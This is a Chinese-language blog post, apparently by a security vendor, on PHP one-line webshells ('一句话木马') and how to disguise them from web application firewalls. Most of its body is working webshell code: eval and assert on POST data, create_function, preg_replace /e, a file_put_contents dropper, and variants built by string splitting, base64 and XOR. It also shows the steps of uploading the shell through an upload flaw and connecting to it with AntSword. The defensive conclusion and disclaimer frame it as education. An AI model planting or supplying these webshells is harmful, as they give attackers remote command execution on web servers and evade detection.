一句话木马(铭说 | 一句话木马的多种变形方式)

一句话木马

今天来和大家聊一聊,一句话木马的多种变形方式。
经常有客户的网站碰到被上传小马和大马,这里的“马”是木马的意思,可不是真实的马。
通常,攻击者利用文件上传漏洞,上传一个可执行并且能被解析的脚本文件,通过这个脚本来获得服务器端执行命令的能力,也就是我们经常听到的WebShell,而这个脚本文件就是我们常说的大马和小马。
1
都有些什么“马”?
小马
体积小,功能少,优点在于不易被发现,功能单一,常作为上传大马的跳板。
大马
体积大,功能强大,但是易被发现。
一句话木马
在小马和大马之外衍生出的另一种木马,只需短短一行代码,再结合WebShell工具(如菜刀、蚁剑、冰蝎等等)就能做到与大马能力相当的功能(执行命令行、文件上传、文件下载等功能)。

随着一句话木马的滥用,普通的一句话木马都已经逃不过waf的检测了,为了逃避waf的检测,一句话木马开始了他的变形之旅。
2
一句话木马的变形之路
环境介绍:
解析语言:php(版本:5.6.27)
WebShell工具:蚁剑
【最初的一句话】制作一句话:
<?php @eval($_POST[‘juminfo’]);?>
<?php @assert($_POST[‘juminfo’]);?>

图 1 最简单的一句话木马
找到具有上传漏洞的站点,将该脚本上传,并访问。发现是一片空白,可以说明该木马能被解析。

图 2 访问脚本
使用蚁剑连接。

图 3 蚁剑连接
连接成功,获得WebShell。

图 4 获得webshell
这样的木马虽然简单,但是他明显的关键字很容易就被各类waf检测到。
为了绕过waf,我们的思路可以更宽一些,主要的思路有大小写混淆,字符编码,分散特征码等。
【create_function函数】脚本内容:
<?php
$fun = create_function(”,$_POST[‘juminfo’]);
$fun();
?>
把用户传递的数据生成一个函数fun(),然后再执行fun()。
【create_function函数】脚本内容:
<?php
@call_user_func(assert,$_POST[‘juminfo’]);
?>
call_user_func这个函数可以调用其它函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数。这样的一个语句也可以完成一句话木马。一些被waf拦截的木马可以配合这个函数绕过waf。
【preg_replace函数】脚本内容:
<?php
@preg_replace(“/abcde/e”, $_POST[‘juminfo’], “abcdefg”);
?>
这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令。这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行。
【file_put_contents函数】脚本内容:
<?php
$test='<?php $a=$_POST[“juminfo”];assert($a); ?>’;
file_put_contents(“hello.php”, $test);
?>
使用方法:先用浏览器访问,生成新的文件”hello.php”,再连接”hello.php”。
利用函数生成文件,第一个参数是文件名,第二个参数是文件的内容。
【PHP变量函数】脚本内容:
<?php
$a = “assert”;
$a(@$_POST[‘juminfo’]);
?>
第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。
【PHP可变变量】脚本内容:
<?php
$bb=”assert”;
$a=”bb”;
$$a(@$_POST[‘juminfo’]);
?>
通过上一个语句进行的多一层变化:$$a = $($a) = $ (‘bb’) = $bb = “assert”
【str_replace函数】脚本内容:
<?php
$a=str_replace(“juminfo”, “”, “assjuminfoert”);
$a(@$_POST[‘juminfo’]);
?>
在第三个参数中,查找第一个参数,并替换成第二个参数。这里第二个参数为空字符串,就相当于删除”juminfo”。
【base64_decode函数】脚本内容:
<?php
$a=base64_decode(“YXNzZXJ0”)
$a($_POST[‘juminfo’]);
?>
这里是base64解密函数,”YXNzZXJ0″是assert的base64加密。
【”.”操作符】脚本内容:
<?php
$a=”as”.”s”;
$b=”er”.”t”;
$c=$a.$b;
$c($_POST[‘juminfo’]);
?>
【运算符变形】脚本内容:
<?php
@$_++;
$__=(“`”^”?”).(“:”^”}”).(“%”^”`”).(“{“^”/”);
$___=(“$”^”{“).(“~”^”.”).(“/”^”`”).(“-“^”~”).(“(“^”|”);
${$__}[!$_](${$___}[$_]);
?>
当我第一次看到这个脚本的时候,一头雾水,这是什么东西?
后来用echo打印出三个变量$_++、$__、$___可以看到他们的值分别为1、_GET、_POST,放入最后一条语句中刚好组成一个两层的一句话木马。
<?php $_GET[0]($_POST[1])?>
只要我们将0赋值为assert就可以构成经典的一句话<?php assert($_POST[1])?>,密码是1。

图 5 二层一句话木马的连接方式
3
总结
一句话的混淆方式还有很多很多,基于以上的变形思路还能够衍生出无数新的变种木马,为了更好地防止“被放马”的事件发生,我们应该及时对使用的安全产品进行更新,才能让“马”无处可走。
免责声明:本文提及的技术仅可用于私人学习测试等合法场景中,任何不当利用该技术所造成的刑事、民事责任均与本文作者无关。

推荐阅读
《聚铭网络入选中国网络安全行业全景图六大细分领域!》
《聚铭网络成功入选为中国网络安全产业联盟会员单位!》
《强强联合!腾讯安全威胁情报接入聚铭网络全系产品》
《聚铭网络获腾讯战略投资,拥抱产业互联网,加速智慧安全发展》
* 粉丝福利:
公众号对话栏回复“小铭哥”参与抽奖活动,赢取聚铭网络吉祥物“小铭哥”公仔!
—- END —-

一句话木马相关文章

版权声明